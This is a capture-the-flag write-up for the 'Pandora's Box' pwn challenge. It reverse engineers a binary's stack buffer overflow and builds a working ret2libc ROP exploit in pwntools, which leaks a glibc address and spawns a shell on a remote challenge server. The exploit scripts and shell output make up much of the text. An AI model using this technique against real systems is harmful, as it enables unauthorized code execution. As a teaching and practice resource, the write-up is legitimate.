Pandora's Box

9 minutes to read

We are given a 64-bit binary called pb:

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
RUNPATH:  b'./glibc/'

Reverse engineering

We can use Ghidra to analyze the binary and look at the decompiled source code in C:

int main() {
  setup();
  cls();
  banner();
  box();
  return 0;
}

Among others, this function calls box:

void box() {
  long num;
  char data [32];

  data._0_8_ = 0;
  data._8_8_ = 0;
  data._16_8_ = 0;
  data._24_8_ = 0;

  fwrite("This is one of Pandora\'s mythical boxes!\n\nWill you open it or Return it to the Library  for analysis?\n\n1. Open.\n2. Return.\n\n>> ", 1, 0x7e, stdout);
  num = read_num();

  if (num != 2) {
    fprintf(stdout,"%s\nWHAT HAVE YOU DONE?! WE ARE DOOMED!\n\n",&DAT_004021c7);
                    /* WARNING: Subroutine does not return */
    exit(0x520);
  }

  fwrite("\nInsert location of the library: ", 1, 0x21, stdout);
  fgets(data, 256, stdin);
  fwrite("\nWe will deliver the mythical box to the Library for analysis, thank you!\n\n", 1, 0x4b, stdout);

  return;
}

Buffer Overflow vulnerability

The binary is vulnerable to Buffer Overflow since there is a variable called data that has 32 bytes assigned as buffer, but the program is reading up to 256 bytes from stdin and storing the data into data, overflowing the reserved buffer if the size of the input data is greater than 32 bytes.

We can check that it crashes in this situation (option 2):

$ ./pb

                ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙
                ▣                 ▣
                ▣       ◊◊        ▣
                ▣ ◊◊◊◊◊◊◊◊◊◊◊◊◊◊◊ ▣
                ▣       ◊◊        ▣
                ▣                 ▣
                ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙

This is one of Pandora's mythical boxes!

Will you open it or Return it to the Library for analysis?

1. Open.
2. Return.

>> 2

Insert location of the library: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

We will deliver the mythical box to the Library for analysis, thank you!

zsh: segmentation fault (core dumped)  ./pb

Due to the fact that it is a 64-bit binary without canary protection, the offset needed to overflow the buffer and reach the stack is 40 (because after the reserved 32 bytes, the old value of $rbp is saved, and right after, the saved return address).

However, this time is a bit different. The best thing is to check the disassembly for box:

$ objdump -M intel --disassemble=box pb

pb:     file format elf64-x86-64


Disassembly of section .init:

Disassembly of section .plt:

Disassembly of section .text:

00000000004012c2 <box>:
  4012c2:	55                   	push   rbp
  4012c3:	48 89 e5             	mov    rbp,rsp
  4012c6:	48 83 ec 30          	sub    rsp,0x30
  4012ca:	48 c7 45 d0 00 00 00 	mov    QWORD PTR [rbp-0x30],0x0
  4012d1:	00
  4012d2:	48 c7 45 d8 00 00 00 	mov    QWORD PTR [rbp-0x28],0x0
  4012d9:	00
  4012da:	48 c7 45 e0 00 00 00 	mov    QWORD PTR [rbp-0x20],0x0
  4012e1:	00
  4012e2:	48 c7 45 e8 00 00 00 	mov    QWORD PTR [rbp-0x18],0x0
  4012e9:	00
  4012ea:	48 8b 05 1f 2d 00 00 	mov    rax,QWORD PTR [rip+0x2d1f]        # 404010 <stdout@@GLIBC_2.2.5>
  ...
  40139e:	e8 1d fd ff ff       	call   4010c0 <fwrite@plt>
  4013a3:	90                   	nop
  4013a4:	c9                   	leave
  4013a5:	c3                   	ret

Disassembly of section .fini:

We see that there is 0x30 (48) new space on the stack, plus 8 bytes for the saved $rbp from the previous stack frame. After that, we will have the saved $rip (return address), which we want to modify with the Buffer Overflow vulnerability. In total, we need 56 bytes to reach the position of the return address on the stack.

Exploit strategy

Since the binary has NX protection, we must use Return-Oriented Programming (ROP) to execute arbitrary code. This technique makes use of gadgets, which are sets of instructions that end in ret (usually). We can add a list of addresses for gadgets on the stack so that when a gadget is executed, it returns to the stack and executes the next gadget. That is the meaning of ROP chain.

This is a bypass for NX protection since we are not executing instructions in the stack (shellcode), but we are redirecting the program to specific addresses that are executable and run the instructions we want.

In order to gain code execution, we will perform a ret2libc attack. This technique consists of calling system inside Glibc using "/bin/sh" as first parameter to the function (which is also inside Glibc). The problem we must handle is ASLR, which is a protection set for shared libraries that randomize a base address.

Since we want to call system and take "/bin/sh", we need to know the addresses of those values inside Glibc at runtime (these addresses will change in every execution). Hence, we must find a way to leak an address inside Glibc because the only thing that is random is the base address of Glibc; the rest of the addresses are computed as offsets to that base address.

The process of leaking a function comes with calling a function like puts (or printf or write) using an address from the Global Offset Table (GOT) as first argument (for example, fprintf). This table contains the real addresses of the external functions used by the program (if they have been resolved). Since puts is used by the binary, to call it we can use the Procedure Linkage Table (PLT), which applies a jump instruction to the real address of puts.

One more thing to consider is the use of gadgets. Because of the calling conventions for 64-bit binaries, when calling a function, the arguments must be stored in registers (in order: $rdi, $rsi, $rdx, $rcx…). For example, the instruction pop rdi will take the next value from the stack and store it in $rdi.

Exploit development

Nice, let’s start with the leakage process. These are the values we need:

Address of pop rdi; ret gadget (0x40142b):

$ ROPgadget --binary pb | grep 'pop rdi ; ret'
0x000000000040142b : pop rdi ; ret

GOT addresses:

$ objdump -R pb

pb:     file format elf64-x86-64

DYNAMIC RELOCATION RECORDS
OFFSET           TYPE              VALUE
0000000000403ff0 R_X86_64_GLOB_DAT  __libc_start_main@GLIBC_2.2.5
0000000000403ff8 R_X86_64_GLOB_DAT  __gmon_start__
0000000000404010 R_X86_64_COPY     stdout@@GLIBC_2.2.5
0000000000404020 R_X86_64_COPY     stdin@@GLIBC_2.2.5
0000000000403fa0 R_X86_64_JUMP_SLOT  puts@GLIBC_2.2.5
0000000000403fa8 R_X86_64_JUMP_SLOT  printf@GLIBC_2.2.5
0000000000403fb0 R_X86_64_JUMP_SLOT  alarm@GLIBC_2.2.5
0000000000403fb8 R_X86_64_JUMP_SLOT  read@GLIBC_2.2.5
0000000000403fc0 R_X86_64_JUMP_SLOT  fgets@GLIBC_2.2.5
0000000000403fc8 R_X86_64_JUMP_SLOT  fprintf@GLIBC_2.2.5
0000000000403fd0 R_X86_64_JUMP_SLOT  setvbuf@GLIBC_2.2.5
0000000000403fd8 R_X86_64_JUMP_SLOT  strtoul@GLIBC_2.2.5
0000000000403fe0 R_X86_64_JUMP_SLOT  exit@GLIBC_2.2.5
0000000000403fe8 R_X86_64_JUMP_SLOT  fwrite@GLIBC_2.2.5

Address of puts at the PLT (0x404030):

$ objdump -M intel -d pb | grep puts@plt
0000000000401030 <puts@plt>:
  40124a:       e8 e1 fd ff ff          call   401030 <puts@plt>
  401261:       e8 ca fd ff ff          call   401030 <puts@plt>
  40126d:       e8 be fd ff ff          call   401030 <puts@plt>

Address of main (0x4013a6):

$ objdump -M intel -d pb | grep '<main>'
00000000004013a6 <main>:

I have shown the manual approach to start the ret2libc exploit. However, I will be using pwntools from now on.

Leaking memory addresses

We can use this Python script:

#!/usr/bin/env python3

from pwn import *

context.binary = elf = ELF('pb')
glibc = ELF('glibc/libc.so.6', checksec=False)
rop = ROP(elf)


def get_process():
    if len(sys.argv) == 1:
        return elf.process()

    host, port = sys.argv[1].split(':')
    return remote(host, port)


def main():
    p = get_process()

    offset = 56
    junk = b'A' * offset

    payload  = junk
    payload += p64(rop.rdi[0])
    payload += p64(elf.got.fprintf)
    payload += p64(elf.plt.puts)
    payload += p64(elf.sym.main)

    p.sendlineafter(b'>> ', b'2')
    p.sendlineafter(b'Insert location of the library: ', payload)
    p.interactive()


if __name__ == '__main__':
    main()

Here we have leaked the address of fprintf at runtime:

$ python3 solve.py
[*] './pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 143704
[*] Switching to interactive mode

We will deliver the mythical box to the Library for analysis, thank you!

\xb0\x16\xe9\x98

        ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙
        ▣                 ▣
        ▣       ◊◊        ▣
        ▣ ◊◊◊◊◊◊◊◊◊◊◊◊◊◊◊ ▣
        ▣       ◊◊        ▣
        ▣                 ▣
        ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙

This is one of Pandora's mythical boxes!

Will you open it or Return it to the Library for analysis?

1. Open.
2. Return.

>> $

We also see that we have returned to main, which is necessary because we have to enter another payload without stopping the program.

Now we will to compute the base address of Glibc, which can be done with a simple computation. We can subtract the offset of fprintf to its real address so that we get the base address. Let’s take all the offsets needed:

Offset of fprintf (0x606b0):

$ readelf -s glibc/libc.so.6 | grep fprintf
000000000005a4f0    11 FUNC    GLOBAL DEFAULT   15 _IO_vfprintf@@GLIBC_2.2.5
00000000000606b0   183 FUNC    WEAK   DEFAULT   15 _IO_fprintf@@GLIBC_2.2.5
0000000000134e20   192 FUNC    GLOBAL DEFAULT   15 __fprintf_chk@@GLIBC_2.3.4
00000000000606b0   183 FUNC    GLOBAL DEFAULT   15 fprintf@@GLIBC_2.2.5
000000000005a4f0    11 FUNC    GLOBAL DEFAULT   15 vfprintf@@GLIBC_2.2.5
0000000000134f00    28 FUNC    GLOBAL DEFAULT   15 __vfprintf_chk@@GLIBC_2.3.4

Offset of system (0x50d60):

$ readelf -s glibc/libc.so.6 | grep system
0000000000050d60    45 FUNC    GLOBAL DEFAULT   15 __libc_system@@GLIBC_PRIVATE
0000000000050d60    45 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.2.5
0000000000169140   103 FUNC    GLOBAL DEFAULT   15 svcerr_systemerr@GLIBC_2.2.5

Offset of "/bin/sh" (0x1d8698):

$ strings -atx glibc/libc.so.6 | grep /bin/sh
 1d8698 /bin/sh

Getting RCE

Then, we can compute the real addresses of system and "/bin/sh" at runtime because we have the base address of Glibc at runtime. Let’s check it out:

    fprintf_addr = u64(p.recvline().strip().ljust(8, b'\0'))
    p.info(f'Leaked fprintf() address: {hex(fprintf_addr)}')

    glibc.address = fprintf_addr - glibc.sym.fprintf
    p.info(f'Glibc base address: {hex(glibc.address)}')

$ python3 solve.py
[*] './pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 150949
[*] Leaked fprintf() address: 0x7f47e48ff6b0
[*] Glibc base address: 0x7f47e489f000
[*] Switching to interactive mode

        ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙
        ▣                 ▣
        ▣       ◊◊        ▣
        ▣ ◊◊◊◊◊◊◊◊◊◊◊◊◊◊◊ ▣
        ▣       ◊◊        ▣
        ▣                 ▣
        ◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙◙

This is one of Pandora's mythical boxes!

Will you open it or Return it to the Library for analysis?

1. Open.
2. Return.

>> $

As a sanity check, we see that the base address of Glibc ends in 000 in hexadecimal, and that’s correct. Let’s finish the exploit:

    payload  = junk
    payload += p64(rop.rdi[0])
    payload += p64(next(glibc.search(b'/bin/sh')))
    payload += p64(glibc.sym.system)

    p.sendlineafter(b'>> ', b'2')
    p.sendlineafter(b'Insert location of the library: ', payload)
    p.recv()

    p.interactive()

$ python3 solve.py
[*] './pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 151797
[*] Leaked fprintf() address: 0x7fdbb41c36b0
[*] Glibc base address: 0x7fdbb4163000
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$

But it does not work (Got EOF while reading in interactive). This might be a stack alignment issue (as in Labyrinth). A single ret gadget before calling system will do the trick (otherwise, we would need to use GDB to debug the exploit):

    payload  = junk
    payload += p64(rop.rdi[0])
    payload += p64(next(glibc.search(b'/bin/sh')))
    payload += p64(rop.ret[0])
    payload += p64(glibc.sym.system)

And now it works correctly:

$ python3 solve.py
[*] './pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Starting local process './pb': pid 154943
[*] Leaked fprintf() address: 0x7fe5fb7d36b0
[*] Glibc base address: 0x7fe5fb773000
[*] Switching to interactive mode
$ ls
flag.txt  glibc  pb  solve.py
$ cat flag.txt
HTB{f4k3_fl4g_4_t35t1ng}

Flag

So, let’s try remotely:

$ python3 solve.py 165.232.98.11:30618
[*] './pb'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'./glibc/'
[*] Loaded 14 cached gadgets for 'pb'
[+] Opening connection to 165.232.98.11 on port 30618: Done
[*] Leaked fprintf() address: 0x7f0b43b8a6b0
[*] Glibc base address: 0x7f0b43b2a000
[*] Switching to interactive mode
$ ls
core
flag.txt
glibc
pb
$ cat flag.txt
HTB{r3turn_2_P4nd0r4?!}

The full exploit code is here: solve.py.